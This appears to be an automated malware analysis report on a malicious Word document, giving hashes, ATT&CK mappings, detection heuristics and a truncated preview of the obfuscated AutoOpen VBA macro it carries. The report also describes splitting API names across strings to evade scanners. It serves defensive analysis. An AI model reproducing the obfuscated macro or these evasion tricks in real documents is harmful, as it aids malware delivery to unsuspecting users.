Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a84f577a6a828fa6…

MALICIOUS

Office (OLE)

240.0 KB Created: 2019-03-14 09:03:00 Authoring application: Microsoft Office Word First seen: 2019-04-21
MD5: f1edd94e7784dbe871db7c5233199894 SHA-1: a123f82d55d47036958932affaed27d759a1a56f SHA-256: a84f577a6a828fa6e52967597d0e9c724d84c368a82f0735b327a6299396da54
322 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with obfuscated API calls, specifically reassembling 'Win32_Process'. The presence of an AutoOpen macro and GetObject calls, combined with the 'Password-protected archive handoff' heuristic, strongly suggests the macro is designed to download and execute a secondary payload, likely disguised as an archive requiring a password. The ClamAV detection further supports its malicious nature.

Heuristics 9

  • ClamAV: Doc.Malware.Obfuse-6894441-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Obfuse-6894441-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 63810 bytes
SHA-256: a4c3eb7e584454eb13fc97f82cee3c3356d12e882701655861e754e070dc9b3c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "EooGUxB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function w4AADwBo()
   If GQAQAAo = axCDGB Then
         UAAAAAAA = 466952283 * PDc11DXG
         bDADcA = JcAGoc - 684631648 + 135173192 + GBAAAAXD * 516719261 / 726471564 + 648551095 / Chr(985056106 / CSng(474302865 + Round(toCAAAA))) + 185581019 * Log(AB4Xx4) - 151421966 - 718397745 + lADA1AA * CLng(iXZkAxkU - Atn(pBAQAoZ / 578193572 / 887471659 + ZAABAU))
         hAAAXAD = 508327790 * JoACAA
End If
   If dBBABAUA = zA11AD Then
         dQ_AxAAA = 402393400 * WXAo_co
         NAA_4BAo = AUkA4QXA - 570668213 + 337835927 + VQQcAD * 757953111 / 834266012 + 317255437 / Chr(383656263 / CSng(344146892 + Round(qAxkAAB))) + 588917922 * Log(J1DxkAA) - 306596959 - 393301097 + RoUAx_kB * CLng(CGAQBXG - Atn(HUAABGAA / 630805576 / 575746931 + zAAZxA))
         wAAACk = 618336604 * NAZA_G
End If
   If uAU1AZGQ = hkwZwGB Then
         IAokAUBk = 512730943 * wUCXCAAQ
         fADBA_Gx = TBA_BxxQ - 579013270 + 474389174 + TCAAAx * 564295169 / 414379212 + 520262437 / Chr(91057043 / CSng(393720444 + Round(uZ1AAXD))) + 42933899 * Log(VGZDAQA) - 189588314 - 445845753 + oAUx1A_ * CLng(PAcACQ - Atn(R11ko_A / 561147237 / 661189482 + hoACAkD))
         vCQAc1XA = 696906833 * VAcBA1A
End If
   If HAXB1AAc = T_AxACB Then
         pUwXcCA = 826182758 * S11A_QA
         GQAAxx = nBZZAD - 340538482 + 239211030 + HXAcAoUD * 67817526 / 61642054 + 410678146 / Chr(846137927 / CSng(489950363 + Round(l1AADw))) + 176597466 * Log(dAADACCA) - 319320728 - 629361659 + MAAAwGC * CLng(vD4wAAQZ - Atn(wBAUAAA4 / 107070645 / 97629358 + s4BZkUB))
         MUAAXAo = 834933071 * QACAoXA
End If
   If ZGo1xkA = jDwXZA4 Then
         JZZAAZ = 808910344 * PDQCUAGA
         NBkAAxUZ = wBGAADAo - 697641972 + 238579716 + vX_UBGD * 53046749 / 519593622 + 686040830 / Chr(88222528 / CSng(943366783 + Round(DQQQxc))) + 520183065 * Log(nGAZAU) - 778454554 - 126415447 + pAAAAX * CLng(MAw_AA - Atn(zkAwUC / 574893743 / 190492655 + KXUAABQA))
         IZ_41B1 = 72678777 * wXAAAG
End If
   If hQCww4_A = CBU4cZA Then
         lGQUkADB = 758122670 * cxACAc
         vAA4oBUA = LUcAxA - 23241446 + 103597295 + vAAUAADx * 390292787 / 448252209 + 878150079 / Chr(984180089 / CSng(225039960 + Round(uAAGoAGo))) + 250999568 * Log(RZxUAAA_) - 947597680 - 772639707 + pUADAQ * CLng(ZDAAkc - Atn(Fw1AAxAB / 9191079 / 984161703 + qQCkoA))
         GDADAA1A = 345809850 * zXwDUZ
End If
   If G_AAZQk = WkQDA14A Then
         bAQCDwAo = 258795957 * LcUQU_AQ
         GGDA1A = mAAA__B - 337034406 + 530879573 + IoBwAwk * 161068191 / 557922174 + 339947291 / Chr(829342812 / CSng(315946567 + Round(bUwUoD))) + 771308079 * Log(bBU_ZAC) - 382694616 - 928322173 + bU1_ABA * CLng(AAAUZCD - Atn(hAAxDAU / 641429071 / 744397674 + fCACwA))
         nGAAZZ = 536969756 * jcBB4A1B
End If
End Function
Sub autoopen()
On Error Resume Next
   If Z4ADAAU = FXABB1 Then
         LDAUcDA = 589186681 * sADUoAQ
         tCAXBUA = DDDBxX4C - 710047603 + 870695193 + fZwDBQC * 386877617 / 323738914 + 64453685 / Chr(311817315 / CSng(82036562 + Round(d_AZxX))) + 951623794 * Log(JD1AAkA) - 37113582 - 652607472 + OAQBAA * CLng(UxAxAo4k - Atn(s1BocA / 14320882 / 539689537 + OUxGAU))
         zAQDAw = 329283678 * R_A1ck
End If
   If FAcBkk4k = oZDABAAC Then
         a4wCABU_ = 923257081 * rBokAUo
         PD4AQwQ = zAGZk__ - 606329578 + 35544645 + VAX4ACA * 489019160 / 764481967 + 910743537 / Chr(126580077 / CSng(831895532 + Round(dkxBXCA))) + 262365803 * Log(ZCAAUAAG) - 493172871 - 815209724 + JcBABA * CLng(swDDBD_ - Atn(YQA1Akk4 / 925777078 / 96695367 + YAQDACxx))
         bBwDAow = 158719334 * AAxAoo
End If
   If ukACAB4w = P_AUoBA Then
         koAUXBD = 388156031 * m1AADA
         ZCAA1U1 = zZCAAAZ - 515433028 + 930484537 + YDDXUAoD * 155602503 / 151232580 + 970679556 / Chr(597750690 / CSng(648829663 + Round(bG
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.